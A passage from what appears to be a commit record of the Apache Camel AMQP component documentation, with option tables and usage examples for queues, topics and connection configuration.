enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. 
| | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyTo* (consumer) | Provides an explicit ReplyTo destination, which overrides any incoming value of Message.getJMSReplyTo(). | | String\n| *replyToDeliveryPersistent* (consumer) | Specifies whether to use persistent delivery by default for replies. | true | boolean\n| *selector* (consumer) | Sets the JMS selector to use | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *acceptMessagesWhileStopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. 
If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuickStop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *consumerType* (consumer) | The consumer type to use, which can be one of: Simple, Default, or Custom. The consumer type determines which Spring JMS listener to use. Default will use org.springframework.jms.listener.DefaultMessageListenerContainer, Simple will use org.springframework.jms.listener.SimpleMessageListenerContainer. When Custom is specified, the MessageListenerContainerFactory defined by the messageListenerContainerFactory option will determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use. | Default | ConsumerType\n| *defaultTaskExecutorType* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *eagerLoadingOfProperties* (consumer) | Enables eager loading of JMS properties and payload as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this options is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *replyToSameDestination Allowed* (consumer) | Whether a JMS consumer is allowed to send a reply message to the same destination that the consumer is using to consume from. This prevents an endless loop by consuming and sending back the same message to itself. | false | boolean\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. 
| | Integer\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | Boolean\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *replyToConcurrentConsumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyToOnTimeoutMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *replyToOverride* (producer) | Provides an explicit ReplyTo destination in the JMS message, which overrides the setting of replyTo. It is useful if you want to forward the message to a remote Queue and receive the reply message from the ReplyTo destination. | | String\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). 
| -1 | long\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *correlationProperty* (producer) | When using InOut exchange pattern use this JMS property instead of JMSCorrelationID JMS property to correlate messages. If set messages will be correlated solely on the value of this property JMSCorrelationID property will be ignored and not set by Camel. | | String\n| *disableTimeToLive* (producer) | Use this option to force disabling time to live. For example when you do request\/reply over JMS, then Camel will by default use the requestTimeout value as time to live on the message being sent. The problem is that the sender and receiver systems have to have their clocks synchronized, so they are in sync. This is not always so easy to archive. So you can use disableTimeToLive=true to not set a time to live value on the sent message. Then the message will not expire on the receiver system. See below in section About time to live for more details. | false | boolean\n| *forceSendOriginalMessage* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *includeSentJMSMessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *replyToDestinationSelector Name* (producer) | Sets the JMS Selector using the fixed name to be used so you can filter out your own replies from the others when using a shared queue (that is, if you are not using a temporary reply queue). | | String\n| *streamMessageTypeEnabled* (producer) | Sets whether StreamMessage type is enabled or not. 
Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *allowSerializedHeaders* (advanced) | Controls whether or not to include serialized headers. Applies only when transferExchange is true. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *headerFilterStrategy* (advanced) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *includeAllJMSXProperties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. 
| false | boolean\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | String\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageListenerContainer Factory* (advanced) | Registry ID of the MessageListenerContainerFactory used to determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use to consume messages. Setting this will automatically set consumerType to Custom. | | MessageListener ContainerFactory\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *useMessageIDAsCorrelation ID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *waitForProvisionCorrelation ToBeUpdatedCounter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvisionCorrelation ToBeUpdatedThreadSleeping Time* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *errorHandlerLoggingLevel* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStackTrace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. 
| | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n|===\n\/\/ endpoint options: END\n\n\n\n\n### Usage\n\nAs the AMQP component inherits from the JMS component, its usage is\nalmost identical to that of the JMS component:\n\n*Using AMQP component*\n\n[source,java]\n------------------------------------\n\/\/ Consuming from AMQP queue\nfrom(\"amqp:queue:incoming\").\n to(...);\n\n\/\/ Sending message to the AMQP topic\nfrom(...).\n to(\"amqp:topic:notify\");\n------------------------------------\n\n
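Because the component is JMS-based, request\/reply (InOut) over AMQP also works the same way as with the JMS component. A minimal sketch, assuming a hypothetical orders queue and using the exchangePattern and requestTimeout options described in the tables above:\n\n*Request\/reply over AMQP*\n\n[source,java]\n------------------------------------\n\/\/ Send the body to the orders queue and block until a reply arrives on a\n\/\/ temporary reply queue (the default replyToType), or until the 30 second\n\/\/ requestTimeout elapses.\nfrom(\"direct:placeOrder\")\n    .to(\"amqp:queue:orders?exchangePattern=InOut&requestTimeout=30000\");\n------------------------------------\n\n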
You can also rely on the <<properties-component,Camel properties>> to read\nthe AMQP connection details. Factory\nmethod `AMQPConnectionDetails.discoverAMQP()` attempts to read Camel\nproperties in a Kubernetes-like convention, as demonstrated in the\nsnippet below:\n\n*AMQP connection details auto-configuration*\n\n[source,bash]\n-----------------------------------------------\nexport AMQP_SERVICE_HOST=\"mybroker.com\"\nexport AMQP_SERVICE_PORT=\"6666\"\nexport AMQP_SERVICE_USERNAME=\"username\"\nexport AMQP_SERVICE_PASSWORD=\"password\"\n-----------------------------------------------\n\n[source,java]\n-----------------------------------------------\n@Bean\nAMQPConnectionDetails amqpConnection() {\n  return AMQPConnectionDetails.discoverAMQP();\n}\n-----------------------------------------------\n\n*Enabling AMQP specific options*\n\nIf you, for example, need to enable `amqp.traceFrames`, you can do that by appending the option to your URI, as in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672?amqp.traceFrames=true\");\n--------------------------------------------------------------------------------------------------------\n\nFor reference take a look at the https:\/\/qpid.apache.org\/releases\/qpid-jms-0.29.0\/docs\/index.html[QPID JMS client configuration].\n\n### Using topics\n\nTo have topics working with `camel-amqp` you need to configure the\ncomponent to use `topic:\/\/` as the topic prefix, as shown below:\n\n[source,xml]\n-------------------------------------------------------------------------------------------------------------------------------\n<bean id=\"amqp\" class=\"org.apache.camel.component.amqp.AMQPComponent\">\n  <property name=\"connectionFactory\">\n    <bean class=\"org.apache.qpid.jms.JmsConnectionFactory\" factory-method=\"createFromURL\">\n      <property name=\"remoteURI\" value=\"amqp:\/\/localhost:5672\" \/>\n      <property name=\"topicPrefix\" value=\"topic:\/\/\" \/> <!-- only necessary when connecting to ActiveMQ over AMQP 1.0 -->\n    <\/bean>\n  <\/property>\n<\/bean>\n-------------------------------------------------------------------------------------------------------------------------------\n\nKeep in mind that both `AMQPComponent#amqpComponent()` methods and\n`AMQPConnectionDetails` pre-configure the component with the topic\nprefix, so you don't have to configure it explicitly.\n\n### See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","old_contents":"[[amqp-component]]\n== AMQP Component\n\n*Available as of Camel version 1.2*\n\nThe *amqp:* component supports the http:\/\/www.amqp.org\/[AMQP 1.0\nprotocol] using the JMS Client API of the http:\/\/qpid.apache.org\/[Qpid]\nproject. In case you want to use AMQP 0.9 (in particular RabbitMQ) you\nmight also be interested in the <<rabbitmq-component,Camel RabbitMQ>>\ncomponent. 
Please keep in mind that prior to the Camel 2.17.0 AMQP\ncomponent supported AMQP 0.9 and above, however since Camel 2.17.0 it\nsupports only AMQP 1.0.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-amqp<\/artifactId>\n <version>${camel.version}<\/version> <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------------------------------------------\n\n### URI format\n\n[source,java]\n---------------------------------------------\namqp:[queue:|topic:]destinationName[?options]\n---------------------------------------------\n\n### AMQP Options\n\nYou can specify all of the various configuration options of the\nlink:..\/..\/..\/..\/camel-jms\/src\/main\/docs\/readme.html[JMS] component after the destination name.\n\n\n\n\n\/\/ component options: START\nThe AMQP component supports 79 options which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | To use a shared JMS configuration | | JmsConfiguration\n| *acceptMessagesWhile Stopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuick Stop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *acknowledgementMode* (consumer) | The JMS acknowledgement mode defined as an Integer. Allows you to set vendor-specific extensions to the acknowledgment mode.For the regular modes, it is preferable to use the acknowledgementModeName instead. | | int\n| *eagerLoadingOf Properties* (consumer) | Enables eager loading of JMS properties as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. 
Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *replyToConcurrent Consumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *errorHandlerLogging Level* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. 
| WARN | LoggingLevel\n| *errorHandlerLogStack Trace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | boolean\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyOnTimeoutToMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. 
This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *useMessageIDAs CorrelationID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *timeToLive* (producer) | When sending messages, specifies the 